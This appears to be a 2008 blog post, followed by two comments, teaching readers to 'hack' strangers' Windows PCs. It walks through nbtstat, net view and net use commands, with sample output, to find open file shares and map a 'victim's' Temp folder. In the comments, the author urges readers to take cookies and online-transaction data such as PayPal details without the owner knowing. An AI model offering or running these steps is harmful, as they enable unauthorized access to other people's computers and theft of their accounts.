It’s a common perception that hacking is a very tedious and time consuming process involving loads of complications, however it isn’t so! All it takes is SOLID brain, a vulnerable system than can be hacked and just a few seconds!! Discover the process…
As usual start the proceedings in the following manner-
Click “Start -> Run -> cmd
At Dos Prompt ->
Nbtstat –A IP address [e.g: nbtstat –A 207.175.1.1]
This will give you a read out that looks like this->
NetBIOS Remote Machine Name Table
The following is an example-
Name Type Status
————————————-
abhi <00> UNIQUE Registered
WORK <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1e> GROUP Registered
WORK <1d> UNIQUE Registered
__MSBROWSE__ <01> GROUP Registered
———————————————–
The numbers in the <> are hex code values. What we are interested in is the “Hex Code” number with <20>.
A hex code of <20> means you have file and printer sharing turned on!
Next step is to find out what is being shared->
Net view \\
[e.g : net view \\207.175.1.1]
You will then get a response that looks similar to this->
Shared resources at \\ip_address
Sharename Type Comment
______________________
MY DOCUMENTS Disk
TEMP Disk
______________________
(The command was completed successfully.)
This indicates that you have gained access to your potential victim’s My Documents Folder as well as their Temp directory.
To get access to those folders next command ->
Net use x: \\\temp
[e.g : net use x: \\207.175.1.1\temp]
If all goes well for you, you will then get a response of
(The command was completed successfully.)
That’s it!! You are all set to HACK the victim’s Temp folder!!
Go try it out :)






























































(8 votes, average: 4.88 out of 5)




August 22nd, 2008 at 4:20 pm
This is not hacking, this is accessing windows shares. Please stop making a fool of yourself with this garbage.
August 23rd, 2008 at 6:09 am
Well as a matter of fact you are indeed correct! It is windows sharing after all but, you can of course access what you want to… And there are high chances that the other person wouldn’t be aware of it!! Had professional hacking been so easily, then by now some one would have already hacked your PC totally!!
Even there are other similar things that can be regarded as windows sharing itself, but people use it to gain access to privileged documents of the other persons like online transactions and cookies that gets saved on the temp folder!
So there’s a possibility of accessing precious details like paypal account or other stuff while a person is online & isn’t aware of the fact that you are using that info… So it can be called HACKING in a vague sense… I am not claiming that it is real hacking, but can serve a similar purpose undoubtedly.. :)